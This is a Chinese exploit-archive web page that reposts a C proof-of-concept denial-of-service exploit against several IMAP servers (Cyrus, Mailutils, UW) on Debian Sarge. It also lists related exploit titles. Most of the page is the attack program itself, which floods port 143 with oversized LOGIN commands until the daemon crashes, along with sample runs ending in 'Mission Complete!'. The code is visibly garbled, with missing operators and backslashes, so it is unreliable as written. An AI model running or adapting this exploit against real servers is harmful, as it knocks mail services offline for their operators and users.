手机
当前位置:查字典教程网 >网络安全 >Exploit >Debian Sarge Multiple IMAP Server Denial of Service Exploit
Debian Sarge Multiple IMAP Server Denial of Service Exploit
摘要:/*DebianSargeMultipleIMAPServerDoS(debianimapers.c)JeremyBrown[0xjbrow...

/*

Debian Sarge Multiple IMAP Server DoS (debianimapers.c)

Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]

Testing Cyrus IMAPd:

bash$ ./debianimapers 192.168.0.189

.....

39 tries and imapd goes down! Mission Complete!

Testing Mailutil's IMAP4d:

bash$ ./debianimapers 192.168.0.189

.....

38 tries and imapd goes down! Mission Complete!

Testing UW-IMAPd:

bash$ ./debianimapers 192.168.0.189

.....

39 tries and imapd goes down! Mission Complete!

bash$

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#define COUNT 100

#define SIZE 100000

char imaplogin[] = "A0001 LOGIN";

int main(int argc, char *argv[])

{

char buffer[SIZE], imapped[SIZE 30];

int i, port = 143;

memset(buffer, 0x41, sizeof(buffer));

memset(imapped, 0, sizeof(imapped));

snprintf(imapped, sizeof(imapped)-1, "%s %s %srnrn", imaplogin, buffer, buffer);

if(argc < 2)

{

printf("nDebian Sarge Multiple IMAP Server DoS");

printf("nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]n");

printf("nUsage %s <host>nn", argv[0]);

return 0;

}

printf("nDebian Sarge Multiple IMAP Server DoS");

printf("nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]n");

int sock;

struct sockaddr_in remote;

remote.sin_family = AF_INET;

remote.sin_port = htons(port);

remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()n"); return -1; }

if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("Error: connect(%s:%d)n", argv[1], port); return -1; }

close(sock);

printf("nUsually takes ~1-2 minutes, LAN/Internet and connection speed will make time vary...n");

for(i = 0; i <= COUNT; i )

{

struct sockaddr_in remote;

remote.sin_family = AF_INET;

remote.sin_port = htons(port);

remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()n"); return -1; }

sleep(1);

if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("n%d tries and imapd goes down! Mission Complete!nn", i); return -1; }

int len = sizeof(imapped);

send(sock, imapped, len, 0);

close(sock);

}

return 0;

}

【Debian Sarge Multiple IMAP Server Denial of Service Exploit】相关文章:

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

CodeDB (list.php lang) Local File Inclusion Vulnerability

Joomla Component EZ Store Remote Blind SQL Injection Exploit

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

精品推荐
分类导航